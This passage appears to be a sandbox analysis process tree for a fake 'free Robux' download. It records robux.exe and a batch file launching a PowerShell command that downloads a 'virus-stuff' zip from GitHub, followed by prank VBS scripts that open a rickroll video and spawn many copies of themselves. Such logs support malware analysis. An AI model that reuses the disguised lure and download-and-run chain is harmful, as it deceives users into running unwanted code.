  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3536 /prefetch:8
  2⤵
  PID:5432
- C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3536 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5876
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3552 /prefetch:1
  2⤵
  PID:5516
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
  2⤵
  PID:452
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5140 /prefetch:1
  2⤵
  PID:4720
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5432 /prefetch:1
  2⤵
  PID:2632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3672 /prefetch:1
  2⤵
  PID:3504
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5588 /prefetch:8
  2⤵
  PID:5196
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5596 /prefetch:8
  2⤵
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  PID:5200
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5464 /prefetch:1
  2⤵
  PID:5832
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:1
  2⤵
  PID:2324
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
  2⤵
  PID:5552
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=1828 /prefetch:8
  2⤵
  PID:2120
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5756 /prefetch:1
  2⤵
  PID:3204
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6300 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1432
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,760525119681498734,12178950534613327851,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6056 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5688

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5524

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4348

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:212

C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\robux.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\robux.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:5768
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\3A40.tmp\3A41.tmp\3A42.bat C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\robux.exe"
  2⤵
  PID:2628
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2260

C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\robux.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\robux.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:6100
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\839D.tmp\839E.tmp\839F.bat C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\robux.exe"
  2⤵
  PID:5336
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Drops file in System32 directory
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4724
- - C:\Windows\system32\timeout.exe
    timeout /t 10 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2572
- - C:\Windows\system32\timeout.exe
    timeout /t 20 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:1628

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\free bobux.bat" "
1⤵
PID:3296
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
  2⤵
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:5600
- C:\Windows\system32\timeout.exe
  timeout /t 10 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:3592
- C:\Windows\system32\timeout.exe
  timeout /t 20 /nobreak
  2⤵
  - Delays execution with timeout.exe
  PID:5660

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\Screenshot 9_8_2022 5_26_53 PM.png" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5124

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s DsSvc
1⤵
- Drops file in System32 directory
PID:6140

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:2864

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\AppData\Local\Temp\Temp1_free-bobux-main.zip\free-bobux-main\free bobux - Notepad 9_8_2022 5_27_50 PM.png" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:1360

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious use of SetWindowsHookEx
PID:5084

C:\Windows\system32\mspaint.exe
"C:\Windows\system32\mspaint.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\Screenshot 9_8_2022 5_26_53 PM.png" /ForceBootstrapPaint3D
1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:5460

C:\Windows\system32\OpenWith.exe
C:\Windows\system32\OpenWith.exe -Embedding
1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:4004

C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe
"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:1232
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C7D1.tmp\C7D2.tmp\C7D3.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
  2⤵
  PID:368
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:1124
- - C:\Windows\system32\timeout.exe
    timeout /t 3 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:5752
- - C:\Windows\system32\timeout.exe
    timeout /t 3 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:5724
- - C:\Windows\system32\timeout.exe
    timeout /t 10 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:5344
- - C:\Windows\system32\timeout.exe
    timeout /t 20 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2572

C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe
"C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
1⤵
- System Location Discovery: System Language Discovery
PID:5204
- C:\Windows\system32\cmd.exe
  "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\356A.tmp\356B.tmp\356C.bat C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux.exe"
  2⤵
  PID:1144
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -command "Invoke-WebRequest https://github.com/astrohnugget/virus-stuff/archive/refs/heads/main.zip -outfile robux2.zip"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:5504
- - C:\Windows\system32\timeout.exe
    timeout /t 10 /nobreak
    3⤵
    - Delays execution with timeout.exe
    PID:2008

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\rickroll.vbs"
1⤵
- Checks computer location settings
PID:3084
- C:\Windows\System32\SndVol.exe
  "C:\Windows\System32\SndVol.exe"
  2⤵
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:2796
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" https://www.youtube.com/watch?v=dQw4w9WgXcQ
  2⤵
  - Enumerates system info in registry
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:4012
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffe4d2ecc40,0x7ffe4d2ecc4c,0x7ffe4d2ecc58
    3⤵
    PID:5764
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1972,i,5601919927470129346,10683622986363415555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=1964 /prefetch:2
    3⤵
    PID:2212
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1924,i,5601919927470129346,10683622986363415555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2144 /prefetch:3
    3⤵
    PID:5276
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2252,i,5601919927470129346,10683622986363415555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=2492 /prefetch:8
    3⤵
    PID:5896
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3132,i,5601919927470129346,10683622986363415555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3144 /prefetch:1
    3⤵
    PID:5448
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3148,i,5601919927470129346,10683622986363415555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=3184 /prefetch:1
    3⤵
    PID:620
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4504,i,5601919927470129346,10683622986363415555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4520 /prefetch:1
    3⤵
    PID:1220
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4716,i,5601919927470129346,10683622986363415555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4380 /prefetch:8
    3⤵
    PID:4580
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4896,i,5601919927470129346,10683622986363415555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=4832 /prefetch:8
    3⤵
    - Modifies registry class
    PID:5980
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5596,i,5601919927470129346,10683622986363415555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5516 /prefetch:8
    3⤵
    PID:4888
- - C:\Program Files\Google\Chrome\Application\chrome.exe
    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5356,i,5601919927470129346,10683622986363415555,262144 --variations-seed-version=20240801-180145.014000 --mojo-platform-channel-handle=5072 /prefetch:8
    3⤵
    PID:388

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2f8 0x51c
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:5440

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2484

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5912

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
1⤵
PID:3972

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
1⤵
PID:2372

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\start.cmd" "
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious behavior: GetForegroundWindowSpam
PID:1032
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:216
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:4780
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:2904
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:972
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:3980
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5624
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:2452
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:1536
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:4636
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5040
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:4648
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5164
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5232
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5968
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5296
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5556
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5484
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:3960
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5348
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:4460
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:2004
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:4904
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:1960
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5760
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6008
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:4268
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:1068
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5692
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:2572
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:1620
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5472
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5948
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:6084
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:5372
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:3764
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:3496
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\Downloads\free-bobux-main\free-bobux-main\robux2\virus-stuff-main\hamburger.vbs"
  2⤵
  PID:1240
- C:\Windows\System32\WScript.exe
